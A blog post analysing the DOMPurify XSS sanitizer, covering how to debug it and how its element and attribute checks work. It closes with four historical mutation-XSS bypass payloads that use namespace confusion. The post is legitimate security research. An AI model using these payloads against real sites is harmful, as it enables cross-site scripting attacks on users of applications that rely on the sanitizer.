Analysis of dompurify
2022-06-24 15:16:00 【Deen_】
0x00 Introduction to DOMPurify
DOMPurify is a fast, open-source, DOM-based XSS sanitizer. It takes HTML as input, parses it into a DOM, traverses the element nodes, sanitizes them, and outputs safe HTML.
GitHub: https://github.com/cure53/DOMPurify
Latest version at the time of writing: 2.2.8
0x01 Common usage
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize("<img/src=x onerror=alert(1)>");
This code outputs <img src="x">.
DOMPurify.sanitize is the most commonly used function. It also accepts a second parameter, which holds the configuration options; see the official documentation.
0x02 Debugging exploration
DOMPurify is written in ES6 syntax. I wanted to debug it with Node in WebStorm, so a few extra steps are needed (see also the article on using ES6 import / export in Node.js):
- Pull down all the code under https://github.com/cure53/DOMPurify/tree/main/src and change the file suffix to .mjs.
- Write your own main.js with the following code:
import createDOMPurify from "./DOMPurify-main/src/purify.mjs";
import JSDOM from 'jsdom';
const window = new JSDOM.JSDOM('').window;
const DOMPurify = createDOMPurify(window);
const html = "<img/src=x onerror=alert(1)>";
console.log(DOMPurify.sanitize(html));
- Add the startup parameter --experimental-modules to node.
0x03 Following the sanitize code
Main code
The main code of the sanitize function is as follows:
const nodeIterator = _createIterator(IN_PLACE ? dirty : body);
/* Now start iterating over the created document */
while ((currentNode = nodeIterator.nextNode())) {
  /* Fix IE's strange behavior with manipulated textNodes #89 */
  if (currentNode.nodeType === 3 && currentNode === oldNode) {
    continue;
  }
  /* Sanitize tags and elements */
  if (_sanitizeElements(currentNode)) {
    continue;
  }
  /* Shadow DOM detected, sanitize it */
  if (currentNode.content instanceof DocumentFragment) {
    _sanitizeShadowDOM(currentNode.content);
  }
  /* Check attributes, sanitize if necessary */
  _sanitizeAttributes(currentNode);
  oldNode = currentNode;
}
oldNode = null;
dirty is the object to be sanitized, that is, the data we passed in.
- First, the _createIterator function and while ((currentNode = nodeIterator.nextNode())) walk the input as individual HTMLElement nodes. For example, <img src=x><svg src=x> yields two elements, img and svg.
- The body of the while loop then operates on each of them; here currentNode is the img or the svg element.
- Two sanitizing operations are performed: _sanitizeElements and _sanitizeAttributes.
- As the names suggest, _sanitizeElements sanitizes the tag itself, and _sanitizeAttributes sanitizes the attributes of the tag.
_sanitizeElements function
/* Check if tagname contains Unicode */
if (stringMatch(currentNode.nodeName, /[\u0080-\uFFFF]/)) {
  _forceRemove(currentNode);
  return true;
}
/* Now let's check the element's type and name */
const tagName = stringToLowerCase(currentNode.nodeName);
If the tag name contains non-ASCII (Unicode) characters, the node is removed directly. Otherwise the tag name is converted to lowercase.
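The check is easy to try in isolation. The following sketch reuses the same character class; the helper name normalizeTagName and the null return value are assumptions of mine, standing in for the _forceRemove call.

```javascript
// Same character class as in the check above: any code unit from U+0080 to U+FFFF.
const NON_ASCII = /[\u0080-\uFFFF]/;

// Returns the lowercased tag name, or null when the name would be rejected.
function normalizeTagName(nodeName) {
  if (NON_ASCII.test(nodeName)) {
    return null; // the real code calls _forceRemove(currentNode) here
  }
  return nodeName.toLowerCase();
}

console.log(normalizeTagName('IMG'));          // prints "img"
console.log(normalizeTagName('scr\u0131pt'));  // contains U+0131, prints null
```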
if (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName]) {
  /* Keep content except for bad-listed elements */
  if (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {
    const parentNode = getParentNode(currentNode) || currentNode.parentNode;
    const childNodes = getChildNodes(currentNode) || currentNode.childNodes;
    if (childNodes && parentNode) {
      const childCount = childNodes.length;
      for (let i = childCount - 1; i >= 0; --i) {
        parentNode.insertBefore(
          cloneNode(childNodes[i], true),
          getNextSibling(currentNode)
        );
      }
    }
  }
  _forceRemove(currentNode);
  return true;
}
Tags that are not on the whitelist (or that are explicitly forbidden) are filtered out. When KEEP_CONTENT is enabled and the tag is not listed in FORBID_CONTENTS, the children of the removed tag are first moved up to its parent. The whitelist is defined in tags.js.
export const html = freeze([ 'a', 'abbr', 'acronym', 'address', 'area', 'article', 'aside', 'audio', 'b', ......
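The KEEP_CONTENT branch is the least obvious part, so here is a rough model of it on a plain object tree. The node shape ({ tag, children }, with strings as text nodes), the two sets and the helper names are assumptions for illustration. The real code clones the children next to the removed node and lets the iterator visit them later, while this sketch simply recurses.

```javascript
const ALLOWED_TAGS = new Set(['div', 'b', 'p']);       // hypothetical allowlist
const FORBID_CONTENTS = new Set(['script', 'style']);  // hypothetical: content is dropped with the tag

// Returns the sanitized replacement for a list of child nodes.
function sanitizeChildren(children, keepContent) {
  const out = [];
  for (const child of children) {
    if (typeof child === 'string') {
      out.push(child); // text node, kept as-is
      continue;
    }
    const kids = sanitizeChildren(child.children, keepContent);
    if (ALLOWED_TAGS.has(child.tag)) {
      out.push({ tag: child.tag, children: kids });
    } else if (keepContent && !FORBID_CONTENTS.has(child.tag)) {
      out.push(...kids); // tag removed, its children take its place
    }
    // otherwise the tag and everything inside it are dropped
  }
  return out;
}

function serialize(nodes) {
  return nodes
    .map((n) => (typeof n === 'string' ? n : `<${n.tag}>${serialize(n.children)}</${n.tag}>`))
    .join('');
}

const tree = [
  {
    tag: 'div',
    children: [
      { tag: 'blink', children: ['hello ', { tag: 'b', children: ['world'] }] },
      { tag: 'script', children: ['alert(1)'] },
    ],
  },
];

const withContent = serialize(sanitizeChildren(tree, true));
const withoutContent = serialize(sanitizeChildren(tree, false));
console.log(withContent);    // prints <div>hello <b>world</b></div>
console.log(withoutContent); // prints <div></div>
```

With keepContent enabled the unknown blink tag disappears but its text and the b element survive, whereas the script content is dropped together with the tag.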
/* Check whether element has a valid namespace */
if (currentNode instanceof Element && !_checkValidNamespace(currentNode)) {
  _forceRemove(currentNode);
  return true;
}
if (
  (tagName === 'noscript' || tagName === 'noembed') &&
  regExpTest(/<\/no(script|embed)/i, currentNode.innerHTML)
) {
  _forceRemove(currentNode);
  return true;
}
This verifies the namespace; there have been bypasses here in the past. It is followed by a check on the noscript and noembed tags, which feels a little redundant to me: these tags are not on the whitelist, so they have already been removed above (presumably the check only matters when a configuration adds them to the whitelist).
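The regular expression in that last check can be tried on its own. This sketch only shows what the pattern matches; the helper name hasNestedClosingTag and the sample strings are mine, not from the DOMPurify source.

```javascript
// Same pattern as in the check above.
const CLOSING_NO_TAG = /<\/no(script|embed)/i;

// True when the serialized content contains a closing noscript/noembed tag.
function hasNestedClosingTag(innerHTML) {
  return CLOSING_NO_TAG.test(innerHTML);
}

console.log(hasNestedClosingTag('<p title="</noscript><img src=x onerror=alert(1)>">')); // prints true
console.log(hasNestedClosingTag('<p>plain text</p>'));                                    // prints false
```

Note that the closing tag is found even though it sits inside an attribute value, which is exactly the kind of content that can be reinterpreted when the output is parsed again.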
_sanitizeAttributes function
First of all, whatever the attribute is, it is removed from the current currentNode (unless a hook sets forceKeepAttr).
if (hookEvent.forceKeepAttr) {
  continue;
}
/* Remove attribute */
_removeAttribute(name, currentNode);
/* Did the hooks approve of the attribute? */
if (!hookEvent.keepAttr) {
  continue;
}
Then the tag name, the attribute name and the attribute value are passed to _isValidAttribute for validation.
const lcTag = currentNode.nodeName.toLowerCase();
if (!_isValidAttribute(lcTag, lcName, value)) {
  continue;
}
If the attribute is valid, setAttribute is called to restore it.
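The remove-first, restore-if-valid pattern can be sketched as follows. A Map stands in for the element's attribute list, and both the allowlist and the value check in isValidAttribute are deliberately crude assumptions of mine, far simpler than the real _isValidAttribute.

```javascript
// Hypothetical allowlist and a deliberately crude value check, for illustration only.
const ALLOWED_ATTR = new Set(['src', 'href', 'alt', 'title']);

function isValidAttribute(name, value) {
  if (!ALLOWED_ATTR.has(name)) return false;
  // Strip whitespace before testing, so "java\nscript:" is caught as well.
  return !/^(?:javascript|data|vbscript):/i.test(value.replace(/\s/g, ''));
}

// attrs is a Map standing in for the element's attribute list.
function sanitizeAttributes(attrs) {
  for (const [name, value] of [...attrs]) {
    attrs.delete(name);                             // step 1: always remove
    const lcName = name.toLowerCase();
    if (!isValidAttribute(lcName, value)) continue; // step 2: validate
    attrs.set(lcName, value);                       // step 3: restore only valid ones
  }
  return attrs;
}

const attrs = new Map([
  ['SRC', 'x'],
  ['onerror', 'alert(1)'],
  ['href', 'java\nscript:alert(1)'],
]);
sanitizeAttributes(attrs);
console.log([...attrs]); // only the src attribute remains
```

Removing first means an attribute survives only if the validation explicitly approves it, so any path that bails out early leaves the attribute gone rather than present.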
The key function is _isValidAttribute. You can step through it in a debugger and try to find a bypass... nice try...
if (ALLOW_DATA_ATTR && regExpTest(DATA_ATTR, lcName)) {
  // This attribute is safe
} else if (ALLOW_ARIA_ATTR && regExpTest(ARIA_ATTR, lcName)) {
  // This attribute is safe
  /* Otherwise, check the name is permitted */
} else if (!ALLOWED_ATTR[lcName] || FORBID_ATTR[lcName]) {
  return false;
  /* Check value is safe. First, is attr inert? If so, is safe */
} else if (URI_SAFE_ATTRIBUTES[lcName]) {
  // This attribute is safe
  /* Check no script, data or unknown possibly unsafe URI
     unless we know URI values are safe for that attribute */
} else if (
  regExpTest(IS_ALLOWED_URI, stringReplace(value, ATTR_WHITESPACE, ''))
) {
  // This attribute is safe
  /* Keep image data URIs alive if src/xlink:href is allowed */
  /* Further prevent gadget XSS for dynamically built script tags */
} else if (
  (lcName === 'src' || lcName === 'xlink:href' || lcName === 'href') &&
  lcTag !== 'script' &&
  stringIndexOf(value, 'data:') === 0 &&
  DATA_URI_TAGS[lcTag]
) {
  // This attribute is safe
  /* Allow unknown protocols: This provides support for links that
     are handled by protocol handlers which may be unknown ahead of
     time, e.g. fb:, spotify: */
} else if (
  ALLOW_UNKNOWN_PROTOCOLS &&
  !regExpTest(IS_SCRIPT_OR_DATA, stringReplace(value, ATTR_WHITESPACE, ''))
) {
  // This attribute is safe
  /* Check for binary attributes */
  // eslint-disable-next-line no-negated-condition
} else if (!value) {
  // Binary attributes are safe at this point
  /* Anything else, presume unsafe, do not add it back */
} else {
  return false;
}
0x04 Historical bypasses
Historical bypasses can be found in the pull requests and in the release changelogs, for example:
Bypass via namespace confusion: https://github.com/cure53/DOMPurify/pull/495
payloads:
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<math><mtext><table><mglyph><style><!--</style><img title="--><img src=1 onerror=alert(1)>">
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(\'XSS\') src>">